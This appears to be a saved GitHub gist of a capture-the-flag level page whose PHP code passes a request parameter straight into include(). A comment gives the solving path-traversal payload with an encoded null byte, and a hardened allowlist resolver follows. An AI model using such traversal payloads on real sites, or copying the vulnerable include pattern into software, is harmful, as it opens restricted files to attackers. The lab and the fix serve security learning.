@evandrix
Forked from trietptm/gist:4467336
Created January 7, 2013 04:45
<!DOCTYPE HTML>
<html lang = "en">
<head>
<title>HackThis!! - Capture the Flag</title>
<meta charset = "UTF-8" />
<link href='https://fonts.googleapis.com/css?family=Ubuntu|Orbitron' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="/ctf/css/main.css">
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
</head>
<body>
<div class='level_title'>
Level 2 </div>
<div class='nav'>
<a href='/ctf/leaderboard'>Leaderboard</a> | <a href='/ctf/irc'>IRC</a> | <a href='/'>Normal Site</a> | <a href='?logout'>Logout</a>
</div>
<div class='level_container'>
<div class='msg_complete'>
Level Completed<br/>
<span class='level_time'>2h 8m 40s</span>
</div>
<a href='/ctf/3'>Next Level</a>
</div>
<div class='level_code'>
<a href='#' class='close'>[X]</a>
<div class='code'>
<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">//&nbsp;...<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">if&nbsp;(</span><span style="color: #0000BB">$page&nbsp;</span><span style="color: #007700">==&nbsp;</span><span style="color: #DD0000">"admin"&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;!</span><span style="color: #0000BB">$user</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">isAdmin</span><span style="color: #007700">())&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;include(</span><span style="color: #DD0000">"admin.php"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;else&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;include(</span><span style="color: #DD0000">"/pages/</span><span style="color: #007700">{</span><span style="color: #0000BB">$page</span><span style="color: #007700">}</span><span style="color: #DD0000">.html"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;}<br /></span><span style="color: #0000BB">?&gt;<br /></span>
</span>
</code> </div>
</div>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-34026704-2']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
<script src="/ctf/js/main.js"></script>
</body>
</html>
evandrix commented Jan 7, 2013

?../admin.php%5C0
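
A hardened counterpart to the `include` logic in the level's PHP snippet, as an added example that is not part of the gist or the challenge's code. `PAGES_DIR`, `ALLOWED_PAGES`, `resolvePage()` and the page names are hypothetical, and it assumes the admin page is meant for admins only.

```php
<?php
// Added example: hardened page resolver. PAGES_DIR, ALLOWED_PAGES and
// resolvePage() are hypothetical names, not part of the challenge code.
const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'about', 'contact']; // constructed allowlist

/**
 * Map the request parameter to a file to include, or null to refuse.
 */
function resolvePage(string $page, bool $isAdmin): ?string
{
    // The admin page is a fixed path, gated on the caller's role
    // (assumption: only admins should reach it).
    if ($page === 'admin') {
        return $isAdmin ? __DIR__ . '/admin.php' : null;
    }

    // Exact-match allowlist: separators, dots, NUL bytes and encoded
    // variants can never equal one of the permitted names.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }

    // Defence in depth: the canonical path must still sit under PAGES_DIR.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $page . '.html');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed inputs: a permitted name (resolves only if pages/home.html
// exists), the admin page as a non-admin, the URL-decoded value from the
// comment on this page, and the same value ending in a real NUL byte.
$samples = ['home', 'admin', '../admin.php\0', "../admin.php\0"];
foreach ($samples as $input) {
    $target = resolvePage($input, false);
    printf("%-24s => %s\n", json_encode($input), $target ?? 'refused');
}
```

The caller should `include` only a non-null return value and answer with a 404 otherwise, so the request parameter never reaches `include` as a string.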
